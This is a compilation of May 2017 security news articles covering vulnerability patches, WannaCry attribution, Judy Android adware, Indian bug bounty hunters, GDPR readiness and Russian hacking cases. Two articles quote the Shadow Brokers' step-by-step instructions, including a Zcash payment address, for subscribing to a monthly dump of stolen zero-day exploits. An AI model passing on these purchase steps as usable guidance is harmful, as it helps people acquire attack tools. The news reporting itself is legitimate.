Suspect Yevgeni Nikulin, who alleges FBI agents linked him to attacks on the US Democratic Party, immediately filed an appeal against the verdict, sending the case to the Czech High Court.

"The Prague municipal court has ruled that Mr Nikulin can be extradited to either country," court spokeswoman Marketa Puci told AFP.

The hearing took place at a Prague prison where the 29-year-old suspect is being held.

Nikulin lodged a complaint against the part of the verdict that says he can be extradited to the United States, she added. Czech Justice Minister Robert Pelikan will make the final decision on the extradition, Puci said.

"It will now go to the High Court in Prague, and the final word is up to the justice minister who will decide to which country he will be extradited or whether he'll be extradited at all," she told AFP.

Czech police, acting in a joint operation with the US Federal Bureau of Investigation (FBI), arrested Nikulin in Prague last October.

The arrest came as Washington formally accused the Russian government of trying to "interfere" in the 2016 White House race through hacking, charges the Kremlin has dismissed.

Moscow immediately accused Washington of harassing its citizens and vowed to fight Nikulin's extradition.

It then issued a separate arrest warrant for him over alleged theft from the WebMoney settlement system.

The US has charged Nikulin with hacking into social networks LinkedIn and Formspring and into the file hosting service Dropbox, Nikulin's lawyer Martin Sadilek told AFP.

He also said Nikulin alleges that FBI investigators had tried in November 2016 and then again in February to persuade him to confess to cyberattacks on the US Democratic Party.

"First it was an unknown English-speaking man who questioned him and allegedly called someone named Jeffrey.

"On February 7, in the official presence of (US) officials, it was allegedly (FBI agent) Jeffrey Miller who questioned him," Sadilek told AFP.

Last July, campaign officials for Democratic US presidential candidate Hillary Clinton blamed Russia for an embarrassing leak of emails from the Democratic National Committee.

Russia has been accused of favoring Republican candidate Donald Trump -- who has praised Putin and called for better ties with Moscow -- over the more hawkish Clinton.


The economic impact of cybercrime will reach $8 Trillion by 2022
30.5.2017 securityaffairs CyberCrime

According to a report published by Juniper Research, the economic impact of cybercrime is expected to reach $8 trillion price tag over the next five years.
According to a report published by Juniper Research, the number of data records that will be compromised in security breaches in 2017 will reach 2.8 billion.

The economic impact of cybercrime is expected to reach $8 trillion price tag over the next five years, the diffusion of IoT devices is enlarging our surface of attack and it will be one of the factors that will sustain this trend.
cybercrime
Small-and mid-size businesses (SMBs) are more exposed to cyber attacks, these organizations will reserve an average of under $4,000 a year in 2017 on cyber security expenses. Unfortunately, experts believe that companies will not increase their security budget despite rising threats.

Patch management, low level of awareness on cyber threat, and usage of older software are the principal problems in the way SMBs approach the cyber security.

The full Juniper Research report includes a lot of interesting data, unfortunately, it isn’t for free.


Vulnerabilities Patched in Aruba Access Policy Platform

30.5.2017 securityweek Vulnerebility
HPE-owned network access solutions provider Aruba informed customers last week that the company’s ClearPass Policy Manager access policy platform is affected by several vulnerabilities.

The most serious of the flaws, based on its CVSS score, is a high severity unauthenticated remote code execution vulnerability tracked as CVE-2017-5824. Another high severity issue is an information disclosure bug (CVE-2017-5647) affecting Apache Tomcat.

The other security holes, classified as medium and low severity, include authenticated remote code execution (CVE-2017-5826), reflected XSS (CVE-2017-5827), privilege escalation (CVE-2017-5825), arbitrary command execution via XXE (CVE-2017-5828), and access restriction bypass issues (CVE-2017-5829).

The vulnerabilities affect all ClearPass Policy Manager versions prior to 6.6.5. Users have been advised to update the product to version 6.6.5 and apply an additional hotfix made available on May 24.

A majority of these vulnerabilities were reported by Luke Young and V. Harishkumar through the company’s Bugcrowd-powered private bug bounty program. The XSS flaw was reported by Phil Purviance of Bishop Fox.

Aruba has been running a private bug bounty program since October 2014 and by the end of 2016 it had already received more than 500 vulnerability reports from 67 researchers. The company has offered up to $1,500 per bug.

In addition to the advisory describing ClearPass Policy Manager flaws, Aruba informed customers last week of a high severity remote code execution vulnerability affecting Airwave Software Glass versions 1.0.0 and 1.0.1. The weakness, tracked as CVE-2017-8946, has been addressed in version 1.0.1-1.


Microsoft Patches Several Malware Protection Engine Flaws

30.5.2017 securityweek Vulnerebility
Microsoft Fixes Several Antimalware Engine Vulnerabilities Found by Google Researchers

Microsoft has released an out-of-band update for its Malware Protection Engine to patch several remote code execution and denial-of-service (DoS) vulnerabilities discovered by Google Project Zero researchers.

Version 1.1.13804.0 of the Microsoft Malware Protection Engine, released on Thursday, addresses a total of eight vulnerabilities identified by various members of Google Project Zero, including Mateusz Jurczyk, Tavis Ormandy, Lokihart and Ian Beer.

Jurczyk has been credited for finding four of the security holes, namely CVE-2017-8536, CVE-2017-8538, CVE-2017-8537 and CVE-2017-8535. The researcher used fuzzing to find heap-based buffer overflow, NULL pointer dereference and other memory corruption vulnerabilities that can lead to arbitrary code execution or a crash of the Malware Protection Engine (MsMpEng) service.

On Friday, after learning of Microsoft’s update for the antimalware engine, Jurczyk published an advisory containing some technical information and proof-of-concept (PoC) code. Ormandy and Beer also made public advisories, including PoC code, for vulnerabilities patched in the latest version of the Malware Protection Engine.

According to Microsoft, the vulnerabilities exist due to the fact that the antimalware engine does not properly scan specially crafted files. An attacker can exploit them for remote code execution and DoS attacks by getting the engine to scan a malicious file, which can be accomplished via several methods.

“For example, an attacker could use a website to deliver a specially crafted file to the victim's system that is scanned when the website is viewed by the user,” Microsoft said. “An attacker could also deliver a specially crafted file via an email message or in an Instant Messenger message that is scanned when the file is opened. In addition, an attacker could take advantage of websites that accept or host user-provided content, to upload a specially crafted file to a shared location that is scanned by the Malware Protection Engine running on the hosting server.”

The vulnerabilities affect several Microsoft products that use the antimalware engine, including Windows Defender, Exchange Server, Windows Intune Endpoint Protection, Security Essentials, Endpoint Protection and Forefront Endpoint Protection. Users of these products do not have to take any action as the update has been applied automatically.

While Microsoft and Google have had some problems when it comes to vulnerability disclosures – Google Project Zero disclosed the details of several flaws in the past before patches were made available – Microsoft has been moving quickly to resolve Malware Protection Engine issues.

Earlier this month, it took the company less than three days to patch a critical remote code execution vulnerability found by Ormandy and Google Project Zero researcher Natalie Silvanovich. The flaws disclosed by Google last week were reported to Microsoft on May 12 and May 16.

Ormandy recently made available a tool for porting Windows dynamic link library (DLL) files to Linux in an effort to improve fuzzing. He demonstrated the tool’s capabilities by porting the Malware Protection Engine to Linux.

Porting the antimalware engine to Linux has made it easier for Google Project Zero researchers to conduct fuzzing and find vulnerabilities.


You can take Shadow Brokers Zero Day Exploit Subscriptions for $21,000 per month
30.5.2017 securityaffairs BigBrothers
Shadow Brokers is going to launch a monthly subscription model for its data dumps, 0-Day Exploit Subscriptions goes for $21,000 per month.
A couple of weeks ago, while security experts were debating about WannaCry ransomware and the NSA exploits it used, the Shadow Brokers group revealed its plan to sell off new exploits every month starting from June. Shadow Brokers plans to offer a data dump based on a monthly subscription model.

The group claimed to have exploit codes for almost any technology available on the market, including “compromised network data from more SWIFT providers and Central banks.”

TheShadowBrokers Monthly Data Dump could be being:

web browser, router, handset exploits and tools
select items from newer Ops Disks, including newer exploits for Windows 10
compromised network data from more SWIFT providers and Central banks
compromised network data from Russian, Chinese, Iranian, or North Korean nukes and missile programs
Now as announced, the group will release new zero-days exploits and hacking tools for various platforms starting from June 2017.

The hacker crew is back with more information on how to subscribe to the monthly subscription service to receive access to the future leaks.

Shadows Brokers group has just released the following instruction to subscribe the service it called “Wine of Month Club.”

Welcome to TheShadowBrokers Monthly Dump Service – June 2017

Q: How do I subscribe and get the next theshadowbrokers’ dump (June 2017)?

#1 – Between 06/01/2017 and 06/30/2017 send 100 ZEC (Zcash) to this z_address:

zcaWeZ9j4DdBfZXQgHpBkyauHBtYKF7LnZvaYc4p86G7jGnVUq14KSxsnGmUp7Kh1Pgivcew1qZ64iEeG6vobt8wV2siJiq

#2 – Include a “delivery email address” in the “encrypted memo field” when sending Zcash payment

#3 – If #1 and #2 then a confirmation email will be sent to the “delivery email address” provided

#4 – Between 07/01/2017 and 07/17/2017 a “mass email” will be send to the “delivery email address” of all “confirmed subscribers” (#1, #2, #3)

#5 – The “mass email” will contain a link and a password for the June 2017 dump

Shadow Brokers

Summarizing, experts who are interested in being members of the “wine of month club” would require to Send 100 ZEC (Zcash) (21,519 USD) and include a ‘delivery email address’ in the ‘encrypted memo field’.

Once received the payment, the Shadow Brokers will send a payment confirmation email to “delivery email address” provided by the subscriber.

The amount of money requested by hackers is very low, 21,000 USD for so precious information is a good affair for intelligence agencies and criminal syndicates.

Between 07/01/2017 and 07/17/2017 the group plans to send a link and a personal password to the subscribers for the June 2017 data dump.

Shadow Brokers still hasn’t decided the content of the June 2017 data dump, in its post, the notorious crew also expressed doubt about the total anonymity implemented by the Zcash cryptocurrency and the Tor network.

“Zcash is having connections to USG (DARPA, DOD, John Hopkins) and Israel. Why USG is “sponsoring” privacy version of bitcoin? Who the fuck is knowing? In defense, TOR is originally being by similar parties. TheShadowBrokers not fully trusting TOR either,” the Shadow Brokers writes.

Experts believe that the group will release authentic and legitimate exploits and hacking tools due to their past data leak.

The data dump could have a dramatic impact on organizations and business worldwide.

Stay tuned…


Shadow Brokers Launches 0-Day Exploit Subscriptions for $21,000 Per Month
30.5.2017 thehackernews BigBrothers
As promised to release more zero-days exploits and hacking tools for various platforms starting from June 2017, the infamous hacking group Shadow Brokers is back with more information on how to subscribe and become a private member for receiving exclusive access to the future leaks.
The Shadow Brokers is the same hacking group who leaked NSA's built Windows hacking tools and zero-day exploits in public that led to the WannaCry menace.
When the Shadow Brokers promised its June 2017 release two weeks ago, the group announced that it would sell new zero-day exploits and hacking tools only to the private members with paid monthly subscription, instead of making them public for everyone.
How to Become Member of the 'Wine of Month' Club?
Now, just a few minutes ago, the hacking collective has released details about how to participate in the monthly subscription model – or the "Wine of Month Club," as the group called it – to get exclusive access to the upcoming leaks each month starting from June.
So, those who are interested in buying the membership of the "wine of month club" would require to:
Send 100 ZEC (Zcash), which is around $21,519 USD, to this z_address (zcaWeZ9j4DdBfZXQgHpBkyauHBtYKF7LnZvaYc4p86G7jGnVUq14KSxsnGmUp7Kh1Pgivcew1qZ64iEeG6vobt8wV2siJiq) between 06/01/2017 and 06/30/2017.
Include a 'delivery email address' in the 'encrypted memo field' when sending Zcash payment.
Once done, the Shadow Brokers will send a payment confirmation email to "delivery email address" provided by all interested members.
Then between 07/01/2017 and 07/17/2017, the group will send another email to all confirmed members, containing a link and their unique password for the June 2017 data dump.
Launched in late October, Zcash is a new cryptocurrency currency that claims to be more anonymous than Bitcoin, as the sender, recipient, and value of transactions remain hidden. However, the group said, it doesn't even trust Zcash and Tor for absolute anonymity.
"Zcash is having connections to USG (DARPA, DOD, John Hopkins) and Israel. Why USG is "sponsoring" privacy version of bitcoin? Who the fuck is knowing? In defense, TOR is originally being by similar parties. TheShadowBrokers not fully trusting TOR either," the Shadow Brokers writes.
What is Going to be in the Next Data Dump?
The hacking collective says the membership has been kept expensive because the data dump has been intended for hackers, security companies, government, and OEMs.
"If you caring about losing $20k+ Euro then not being for you. Monthly dump is being for high rollers, hackers, security companies, OEMs, and governments," the Shadow Brokers say.
Although what the June dump would contain is not clear at the moment, the Shadow Brokers' last announcement claimed that the upcoming data dump would include:
Exploits for operating systems, including Windows 10.
Exploits for web browsers, routers, and smartphones.
Compromised data from banks and Swift providers.
Stolen network information from Russian, Chinese, Iranian, and North Korean nuclear missile programs.
Keeping in mind the last disaster caused due to the leaked NSA exploits, it would not be wrong if security companies buy the June dump for $21,000 per month and secure their products before hackers get their hands on new zero-day exploits to wreak havoc across the world.
The claims made by the Shadow Brokers remain unverified at the time of writing, but since its previously released dump turned out to be legitimate, the group's statement should be taken seriously, at least now, when we know the NSA's backdoors released by the group last month were used by WannaCry and other malware to cause chaos worldwide.
If the announcement made by the Shadow Brokers comes out to be true, the world should be well prepared for another WannaCry-like massive destroyer.
Shadow Brokers Emptied their Bitcoin Account
Before publicly dumping the stolen NSA zero-day exploits in April, the Shadow Brokers put an auction of those cyber weapons for 1 Million Bitcoin.
Although the auction did not go well, the Bitcoin address setup by the hacking collective to collect bids has received a total of 10.5 Bitcoin (around $24,000).
Finally, on Monday, the Shadow Brokers emptied their Bitcoin account, moving all the Bitcoins to subsidiary Bitcoin addresses.


India's Ethical Hackers Rewarded Abroad, Ignored at Home

30.5.2017 securityweek  Hacking
Kanishk Sajnani did not receive so much as a thank you from a major Indian airline when he contacted them with alarming news -- he had hacked their website and could book flights anywhere in the world for free.

It was a familiar tale for India's army of "ethical hackers", who earn millions protecting foreign corporations and global tech giants from cyber attacks but are largely ignored at home, their skills and altruism misunderstood or distrusted.

India produces more ethical hackers -- those who break into computer networks to expose, rather than exploit, weaknesses -- than anywhere else in the world.

The latest data from BugCrowd, a global hacking network, showed Indians raked in the most "bug bounties" -- rewards for red-flagging security loopholes.

Facebook, which has long tapped hacker talent, paid more to Indian researchers in the first half of 2016 than any other researchers.

Indians outnumbered all other bug hunters on HackerOne, another registry of around 100,000 hackers. One anonymous Indian hacker -- "Geekboy" -- has found more than 700 vulnerabilities for companies like Yahoo, Uber and Rockstar Games.

Most are young "techies" -- software engineers swelling the ranks of India's $154-billion IT outsourcing sector whose skill set makes them uniquely gifted at cracking cyber systems.

"People who build software in many cases also understand how it can be broken," HackerOne co-founder Michiel Prins told AFP by email.

But while technology behemoths and multinationals are increasingly reliant on this world-class hacking talent, just a handful of Indian firms run bug bounty programs.

Information volunteered by these cyber samaritans is often treated with indifference or suspicion, hackers and tech industry observers told AFP.

Anand Prakash, a 23-year-old security engineer who has earned $350,000 in bug bounties, said Facebook replied almost immediately when he notified them of a glitch allowing him to post from anyone's account.

"But here in India, the email is ignored most of the time," Prakash told AFP from Bangalore where he runs his own cyber security firm AppSecure India.

"I have experienced situations many times where I have a threatening email from a legal team saying 'What are you doing hacking into our site?'"

Sajnani, who has hacked around a dozen Indian companies, said he was once offered a reward by a company that dropped off the radar once the bugs were fixed.

"Not getting properly acknowledged, or companies not showing any gratitude after you tried to help them, that is very annoying," the 21-year-old told AFP from Ahmedabad, where he hunts for software glitches in between his computer engineering studies.

- Attitudes changing -

An unwillingness to engage its homegrown hackers has backfired spectacularly for a number of Indian startups, forcing a long-overdue rethink of attitudes toward cyber security.

In 2015, Uber-rival Ola launched what it called a "first of its kind" bounty program in India after hackers repeatedly exposed vulnerabilities in the hugely-popular app.

This month Zomato, a food and restaurant guide operating in 23 countries, suffered an embarrassing breach when a hacker stole 17 million user records from its supposedly secure database.

The hacker "nclay" threatened to sell the information unless Zomato, valued at hundreds of millions of dollars, offered bug hunters more than just certificates of appreciation for their honesty.

"If they were paying money to the good guys, maybe 'nclay' would have reported the vulnerability and made the money the right way," Waqas Amir, founder of cyber security website HackRead, told AFP by email.

The incident was especially galling for Prakash. He had hacked Zomato's database just two years earlier, and said if they listened to him then "they would never have been breached in 2017."

In a mea culpa rare for an Indian tech company, Zomato agreed to launch a "healthy" bounty program and encourage other firms to work with ethical hackers.

"We should have taken this more seriously earlier," a Zomato spokeswoman said in a statement to AFP.

The Zomato hack, and panic surrounding this month's global WannaCry cyber attack, comes as the Indian government aggressively denies suggestions its massive biometric identification program is susceptible to leaks.

The government has staunchly defended its "Aadhaar" program, which stores the fingerprints and iris scans of more than one billion Indians on a national database, and has accused those who have raised concerns of illegal hacking.

Prakash said it was vital the government embrace its own through a program like the "Hack the Pentagon" initiative, which last year saw 1,400 security engineers invited to poke holes in the US Department of Defense's cyber fortifications.

"The Indian government definitely needs a bounty programme to make their system more secure," Prakash said.


FreeRADIUS allows hackers to log in without credentials
30.5.2017 securityaffairs  Vulnerebility

The security researcher Stefan Winter has discovered a TLS resumption authentication bypass in FreeRADIUS, the world’s most popular RADIUS Server.
The security researcher Stefan Winter from the Luxembourg’s high-speed academic network RESTENA has discovered a FreeRADIUS TLS resumption authentication bypass.

FreeRADIUS is the world’s most popular RADIUS Server, “it is the basis for multiple commercial offerings. It supplies the AAA needs of many Fortune-500 companies and Tier 1 ISPs. It is also widely used for Enterprise Wi-Fi and IEEE 802.1X network security, particularly in the academic community, including eduroam.”

FreeRADIUS

The flaw, tracked as CVE-2017-9148, resides in the TTLS and PEAP implementations that skip inner authentication when handles a resumed TLS connection.

“The implementation of TTLS and PEAP in FreeRADIUS skips inner authentication when it handles a resumed TLS connection. This is a feature but there is a critical catch: the server must never allow resumption of a TLS session until its initial connection gets to the point where inner authentication has been finished successfully. Unfortunately, affected versions of FreeRADIUS fail to reliably prevent resumption of unauthenticated sessions unless the TLS session cache is” reads the description published in the advisory states. “disabled completely and allow an attacker (e.g. a malicious supplicant) to elicit EAP Success without sending any valid credentials.”

Communications interruptions are very frequent, for example when a user on a TLS connection moves from one cell tower to another, and in due to the flaw it isn’t asked for a new login.

The versions affected by the CVE-2017-9148 flaw are:

2.2.x (EOL but still found in some Linux distros): All versions.
3.0.x (stable): All versions before 3.0.14.
3.1.x and 4.0.x (development): All versions before 2017-02-04.
Sysadmins that works with FreeRADIUS installs need to upgrade to the version 3.0.14 that fixed the issue, temporary mitigation could be obtained by disabling the TLS session caching.

The advisory suggested the following mitigation actions

(a) Disable TLS session caching. Set enabled = no in the cache subsection of eap module settings (raddb/mods-enabled/eap in the standard v3.0.x-style layout).
(b) Upgrade to version 3.0.14.
Giving a look at the timeline of the flaw we can notice that is was also independently reported April 24, 2017, by the researchers Luboš Pavlíèek from the University of Economics, Prague.


With Less Than 1 Year To Go Companies Place Different Priorities on GDPR Compliance
30.5.2017 securityaffairs Privacy

The European General Data Protection Regulation (GDPR) will take effect in one year from now, but a large number of firms are far from prepared.
It feels like Y2K all over again. We are less than one year until the impact of the GDPR is realized, no one is certain what will happen, and everyone is taking a different approach to mitigation.

In April 2016, the European Union introduced the General Data Protection Regulation (GDPR), and it goes into effect in May 2018. The GDPR aims to “create more consistent protection of consumer and personal data across EU nations.” (https://digitalguardian.com/blog/what-gdpr-general-data-protection-regulation-understanding-and-complying-gdpr-data-protection) One way to summarize the requirements is to say that companies that have operations or do business with EU citizens must know where EU citizens’ data in their care is located, ensure it is being handled appropriately, remove the data when requested and notify citizens’ promptly when their data has been compromised. As an individual, this seems an obvious expectation, but working in a company you learn information has a way of spreading among people and systems and trying to control it is very difficult.

“What’s most worrying about the findings,” comments Matt Lock, director of sales engineers at Varonis, “is that one in four organizations doesn’t have a handle on where its sensitive data resides. These companies are likely to have a nasty wake-up call in one year’s time. If they don’t have this fundamental insight into where sensitive data sits within their organizations and who can and is accessing it, then their chances of getting to first base with the regulations are miniscule and they are putting themselves firmly at the front of the queue for fines.” (http://www.securityweek.com/survey-shows-disparity-gdpr-preparedness-and-concerns)
Any company found to be in violation of the regulation, faces fines and penalties up to 4% of their global annual revenue. It is this penalty that has companies taking note and working hard to ensure compliance. But not everyone is taking it seriously, or at least not everyone has started.

GDPR

A recent survey conducted on behalf of Varonis highlights a disparity between the priorities of company executives and those responsible for ensuring compliance. Among the 500 IT decision makers surveyed, 75% “face serious challenges in being compliant with the EU GDPR” by the deadline. (http://www.securityweek.com/survey-shows-disparity-gdpr-preparedness-and-concerns) Not surprising when you learn 42% of company executives do not view compliance by the deadline as a priority. Where does this disparity come from?

The survey included companies from the UK, Germany, France and the US. These companies undoubtedly have different experiences with regulators based on their geographic locations and their operating industries. Some regulators tend to be collaborative in finding a resolution while others tend towards punitive actions. We don’t yet know how EU regulators will apply the GDPR penalties. 92% of respondents expect that a specific industry “will be singled out as an example in the event of a breach” (http://www.securityweek.com/survey-shows-disparity-gdpr-preparedness-and-concerns) with 52% of UK respondents predicting banking, while France and Germany overwhelmingly predict a breach in technology and telecommunications to be the example.

Regardless of who is first, the scale of the first penalty will be the signal to company executives on how much they should devote to compliance. And as with all business decisions, it is one of the minimizing costs to maximize profitability.

56% of UK respondents believe the GDPR will increase complexity for IT teams and result in higher prices for customers with 22% seeing no benefit to their business. (https://www.infosecurity-magazine.com/news/uk-it-leaders-gdpr-will-drive-up/) With these kinds of numbers, it will be difficult to get executive support for compliance efforts. However, 35% of companies surveyed believe GDPR compliance will be beneficial with better protections for personal data being the biggest improvement. While the GDPR only addresses personal information, the exercise will help companies understand the effort required to manage data better and some may see unexpected benefits.

Leading up to January 1, 2000 there were many similar stories about companies taking different approaches to Y2K remediation. Some had enormous, expensive projects running for years, others scrambled at the end of 1999 while a few focused on response planning and hoped for the best. The requirements of the GDPR are well documented, but the likelihood and size of penalties are still unknown. Different companies take different approaches based on industry, geography, and individual risk tolerances. The only certainty is that everyone is watching for the first big consumer data breach in the EU in 2018 and hoping it isn’t theirs.


Linguistic Analysis Suggests WannaCry Hackers Could be From Southern China
30.5.2017 thehackernews Ransomware

It’s been almost four weeks since the outcry of WannaCry ransomware, but the hackers behind the self-spread ransomware threat have not been identified yet.
However, two weeks ago researchers at Google, Kaspersky Lab, Intezer and Symantec linked WannaCry to ‘Lazarus Group,’ a state-sponsored hacking group believed to work for the North Korean government.
Now, new research from dark web intelligence firm Flashpoint indicates the perpetrators may be Chinese, based on its own linguistic analysis.
Flashpoint researchers Jon Condra and John Costello analyzed each of WannaCry's localized ransom notes, which is available in 28 languages, for content, accuracy, and style, and discovered that all the notes, except English and Chinese versions (Simplified and Traditional), had been translated via Google Translate.
According to the research, Chinese and English versions of the ransomware notes were most likely written by a human.
On further analysis, researchers discovered that the English ransom note contains a "glaring" grammatical error, which suggests the ransomware author may be a non-native English speaker.
“Though the English note appears to be written by someone with a strong command of English, a glaring grammatical error in the note suggest the speaker is non-native or perhaps poorly educated.”
And since Google Translate does not work good at translating Chinese to English and English to Chinese, and often produces inaccurate results, the English version could be written for translating the ransom note into other languages.

“Comparisons between the Google translated versions of the English ransomware note to the corresponding WannaCry ransom note yielded nearly identical results, producing a 96% or above match.”
According to the Flashpoint report, the Chinese ransom notes contain "substantial content not present in any other version of the note," and they are longer than and formatted differently from the English one.
The Chinese ransom notes also use proper grammar, punctuation, syntax, and character choice – indicating that the ransomware writer is fluent in the Chinese language.
"A typo in the note, bang zu (幫組) instead of bang zhu (幫助), which means ‘help,' strongly indicates the note was written using a Chinese-language input system rather than being translated from a different version," the researchers explain.
"The text uses certain terms that further narrow down a geographic location. One term, libai ( 禮拜 ) for ‘week,’ is more common in southern China, Hong Kong, Taiwan, and Singapore...The other “杀毒软件” for “anti-virus” is more common in the Chinese mainland."
All these clues made Flashpoint researchers into believing with high confidence that the unknown author or authors of WannaCry ransomware are fluent Chinese speaker and that the Chinese are the source of the English version of the ransom note.
However, Flashpoint researchers say it's hard to speculate the nationality of the WannaCry hackers as they may be affiliated to any Asian (China, Hong Kong, Taiwan, or Singapore).
WannaCry epidemic hit more than 300,000 PCs in more than 150 countries within just 72 hours, using self-spreading capabilities to infect vulnerable Windows PCs, particularly those using older versions of the operating system.
While most of the affected organisations have now returned to normal, law enforcement agencies across the world are on the hunt.


Judy Android Malware Infects Over 36.5 Million Google Play Store Users
3
0.5.2017 securityaffairs Android
Security researchers have claimed to have discovered possibly the largest malware campaign on Google Play Store that has already infected around 36.5 million Android devices with malicious ad-click software.

The security firm Checkpoint on Thursday published a blog post revealing more than 41 Android applications from a Korean company on Google Play Store that make money for its creators by creating fake advertisement clicks from the infected devices.

All the malicious apps, developed by Korea-based Kiniwini and published under the moniker ENISTUDIO Corp, contained an adware program, dubbed Judy, that is being used to generate fraudulent clicks to generate revenue from advertisements.

Moreover, the researchers also uncovered a few more apps, published by other developers on Play Store, inexplicably containing the same the malware in them.

The connection between the two campaigns remains unclear, though researchers believe it is possible that one developer borrowed code from the other, "knowingly or unknowingly."

"It is quite unusual to find an actual organization behind the mobile malware, as most of them are developed by purely malicious actors," CheckPoint researchers say.
Apps available on play store directly do not contain any malicious code that helped apps to bypass Google Bouncer protections.

Once downloaded, the app silently registers user device to a remote command and control server, and in reply, it receives the actual malicious payload containing a JavaScript that starts the actual malicious process.

"The malware opens the URLs using the user agent that imitates a PC browser in a hidden webpage and receives a redirection to another website," the researchers say. "Once the targeted website is launched, the malware uses the JavaScript code to locate and click on banners from the Google ads infrastructure."
The malicious apps are actual legitimate games, but in the background, they act as a bridge to connect the victim’s device to the adware server.

Once the connection is established, the malicious apps spoof user agents to imitate itself as a desktop browser to open a page and generate clicks.

Here’s a list of malicious apps developed by Kiniwini and if you have any of these installed on your device, remove it immediately:

• Fashion Judy: Snow Queen style
• Animal Judy: Persian cat care
• Fashion Judy: Pretty rapper
• Fashion Judy: Teacher style
• Animal Judy: Dragon care
• Chef Judy: Halloween Cookies
• Fashion Judy: Wedding Party
• Animal Judy: Teddy Bear care
• Fashion Judy: Bunny Girl Style
• Fashion Judy: Frozen Princess
• Chef Judy: Triangular Kimbap
• Chef Judy: Udong Maker – Cook
• Fashion Judy: Uniform style
• Animal Judy: Rabbit care
• Fashion Judy: Vampire style
• Animal Judy: Nine-Tailed Fox
• Chef Judy: Jelly Maker – Cook
• Chef Judy: Chicken Maker
• Animal Judy: Sea otter care
• Animal Judy: Elephant care
• Judy’s Happy House
• Chef Judy: Hotdog Maker – Cook
• Chef Judy: Birthday Food Maker
• Fashion Judy: Wedding day
• Fashion Judy: Waitress style
• Chef Judy: Character Lunch
• Chef Judy: Picnic Lunch Maker
• Animal Judy: Rudolph care
• Judy’s Hospital: Pediatrics
• Fashion Judy: Country style
• Animal Judy: Feral Cat care
• Fashion Judy: Twice Style
• Fashion Judy: Myth Style
• Animal Judy: Fennec Fox care
• Animal Judy: Dog care
• Fashion Judy: Couple Style
• Animal Judy: Cat care
• Fashion Judy: Halloween style
• Fashion Judy: EXO Style
• Chef Judy: Dalgona Maker
• Chef Judy: ServiceStation Food
• Judy’s Spa Salon

At least one of these apps was last updated on Play store in April last year, means the malicious apps were propagating for more than a year.

Google has now removed all above-mentioned malicious apps from Play Store, but since Google Bouncer is not sufficient to keep bad apps out of the official store, you have to be very careful about downloading apps.


India's Ethical Hackers Rewarded Abroad, Ignored at Home

30.5.2017 securityweek Hacking

Kanishk Sajnani did not receive so much as a thank you from a major Indian airline when he contacted them with alarming news -- he had hacked their website and could book flights anywhere in the world for free.

It was a familiar tale for India's army of "ethical hackers", who earn millions protecting foreign corporations and global tech giants from cyber attacks but are largely ignored at home, their skills and altruism misunderstood or distrusted.

India produces more ethical hackers -- those who break into computer networks to expose, rather than exploit, weaknesses -- than anywhere else in the world.

The latest data from BugCrowd, a global hacking network, showed Indians raked in the most "bug bounties" -- rewards for red-flagging security loopholes.

Facebook, which has long tapped hacker talent, paid more to Indian researchers in the first half of 2016 than any other researchers.

Indians outnumbered all other bug hunters on HackerOne, another registry of around 100,000 hackers. One anonymous Indian hacker -- "Geekboy" -- has found more than 700 vulnerabilities for companies like Yahoo, Uber and Rockstar Games.

Most are young "techies" -- software engineers swelling the ranks of India's $154-billion IT outsourcing sector whose skill set makes them uniquely gifted at cracking cyber systems.

"People who build software in many cases also understand how it can be broken," HackerOne co-founder Michiel Prins told AFP by email.

But while technology behemoths and multinationals are increasingly reliant on this world-class hacking talent, just a handful of Indian firms run bug bounty programs.

Information volunteered by these cyber samaritans is often treated with indifference or suspicion, hackers and tech industry observers told AFP.

Anand Prakash, a 23-year-old security engineer who has earned $350,000 in bug bounties, said Facebook replied almost immediately when he notified them of a glitch allowing him to post from anyone's account.

"But here in India, the email is ignored most of the time," Prakash told AFP from Bangalore where he runs his own cyber security firm AppSecure India.

"I have experienced situations many times where I have a threatening email from a legal team saying 'What are you doing hacking into our site?'"

Sajnani, who has hacked around a dozen Indian companies, said he was once offered a reward by a company that dropped off the radar once the bugs were fixed.

"Not getting properly acknowledged, or companies not showing any gratitude after you tried to help them, that is very annoying," the 21-year-old told AFP from Ahmedabad, where he hunts for software glitches in between his computer engineering studies.

- Attitudes changing -

An unwillingness to engage its homegrown hackers has backfired spectacularly for a number of Indian startups, forcing a long-overdue rethink of attitudes toward cyber security.

In 2015, Uber-rival Ola launched what it called a "first of its kind" bounty program in India after hackers repeatedly exposed vulnerabilities in the hugely-popular app.

This month Zomato, a food and restaurant guide operating in 23 countries, suffered an embarrassing breach when a hacker stole 17 million user records from its supposedly secure database.

The hacker "nclay" threatened to sell the information unless Zomato, valued at hundreds of millions of dollars, offered bug hunters more than just certificates of appreciation for their honesty.

"If they were paying money to the good guys, maybe 'nclay' would have reported the vulnerability and made the money the right way," Waqas Amir, founder of cyber security website HackRead, told AFP by email.

The incident was especially galling for Prakash. He had hacked Zomato's database just two years earlier, and said if they listened to him then "they would never have been breached in 2017."

In a mea culpa rare for an Indian tech company, Zomato agreed to launch a "healthy" bounty program and encourage other firms to work with ethical hackers.

"We should have taken this more seriously earlier," a Zomato spokeswoman said in a statement to AFP.

The Zomato hack, and panic surrounding this month's global WannaCry cyber attack, comes as the Indian government aggressively denies suggestions its massive biometric identification program is susceptible to leaks.

The government has staunchly defended its "Aadhaar" program, which stores the fingerprints and iris scans of more than one billion Indians on a national database, and has accused those who have raised concerns of illegal hacking.

Prakash said it was vital the government embrace its own through a program like the "Hack the Pentagon" initiative, which last year saw 1,400 security engineers invited to poke holes in the US Department of Defense's cyber fortifications.

"The Indian government definitely needs a bounty programme to make their system more secure," Prakash said.


Russian Hackers Made 'Tainted Leaks' a Thing — Phishing to Propaganda

29.5.2017 thehackernews BigBrothers

We came across so many revelations of sensitive government and corporate data on the Internet these days, but what's the accuracy of that information leaked by unknown actors? How much real are that information that you completely trust upon?
Security researchers have discovered new evidence of one such sophisticated global espionage and disinformation campaign with suspected ties to the Russian government that's been aimed to discredit enemies of the state.
Although there is no definitive proof of Russian government's involvement in the campaign, there is "overlap" with previously reported cyber espionage activities tied to a Russia-backed hacking group well known as APT28.
APT28 — also known as Fancy Bear, Sofacy, Sednit, and Pawn Storm — is the same group which was responsible for the Democratic National Committee (DNC) breach. The group has been operating since at least 2007 and has alleged tied to the Russian government.
A new report, titled Tainted Leaks, published this week by the Citizen Lab at the University of Toronto's Munk School of Global Affairs gives a new view on how Russian state-sponsored hackers targeted over 200 Gmail users, including journalists, activists critical of the Kremlin and those connected with the Ukrainian military to steal sensitive emails from their accounts.

The hackers then manipulate those stolen emails before being published on the Internet, planting disinformation alongside legitimate leaks.
